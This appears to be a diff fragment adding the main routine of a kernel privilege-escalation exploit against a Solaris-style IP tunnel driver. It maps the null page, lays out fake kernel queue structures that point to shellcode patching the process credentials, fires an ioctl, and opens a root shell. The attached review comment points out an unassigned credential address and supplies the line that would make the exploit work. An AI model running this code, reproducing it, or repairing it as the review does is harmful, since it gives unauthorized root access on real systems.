+ strcpy(req.ifta_lifr_name, "ip.tun0:012");
+
+ nullpage = (int*)mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_PRIVATE | MAP_ANON, -1, 0);
+ if (nullpage == MAP_FAILED) {
+ fprintf(stderr, "[-] can't mmap null page\n");
+ return -2;
+ } else {
+ fprintf(stderr, "[*] mapping zero page successful\n");
+ }
+
+ if (cred_addr == -1) {
+ fprintf(stderr, "[-] can't get process address\n");
+ return -3;
+ } else {
+ cred_addr += 0x5 * sizeof(int *);
+ fprintf(stderr, "[*] process cred address: 0x%08x\n", cred_addr);
+ memcpy(shellcode + 2, &cred_addr, 4);
+ }
+
+ fprintf(stderr, "[*] prepare null page\n");
+ memset(nullpage, 0, 0x1000);
+ /* offset 0x0 = ipif_t */
+ /* offset 0x4 = ipif_ll */
+ *(nullpage + 0x004 / 4) = 0x200;
+ /* offset 0x200 = ill_t */
+ /* offset 0x008 = ill_wq */
+ *(nullpage + 0x208 / 4) = 0x400;
+ /* offset 0x400 = queue_t */
+ /* offset 0x00c = q_next */
+ *(nullpage + 0x40c / 4) = 0x600;
+ /* offset 0x600 = queue_t (second) */
+ /* offset 0x000 = qinfo */
+ *(nullpage + 0x600 / 4) = 0x800;
+ /* offset 0x800 = qinfo */
+ /* offset 0x000 = qi_putp */
+ *(nullpage + 0x800 / 4) = 0x900;
+ memcpy((char*)nullpage + 0x900, shellcode, sizeof(shellcode));
+
+ /* install signla handler to clean up write queue */
+ signal(SIGALRM, clean_up_wq);
+ alarm(1);
+
+ /* launch attack */
+ ioctl(s, SIOCGTUNPARAM, &req);
+
+ /* start root shell - not really required because p_cred is shared
+ * but we want the nice # prompt ;-) */
+ system("/bin/sh");
+
+ return 0;
+}
+
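Review bot: `cred_addr` is tested at `if (cred_addr == -1) {` without ever being assigned — it is declared as `int cred_addr;` with no initializer and `get_proc_address()` is defined but never called — so the comparison reads an indeterminate value (undefined behaviour) and the `\xff\xff\xff\xff` slot in `shellcode` is patched with garbage; add `cred_addr = get_proc_address();` immediately before that check. The whole of main() is inside this hunk, so this is not an artifact of a cut-off view. `get_proc_address()` returns `psinfo.pr_addr` through `int`, which fits the 32-bit x86 target named in the header but silently truncates on a 64-bit kernel, so the function deserves a comment like `/* 32-bit x86 only: pr_addr is truncated to int */`. The `SIGALRM` handler `clean_up_wq` calls `fprintf`, which is not async-signal-safe; acceptable in a proof of concept, but worth a one-line note so nobody copies the pattern.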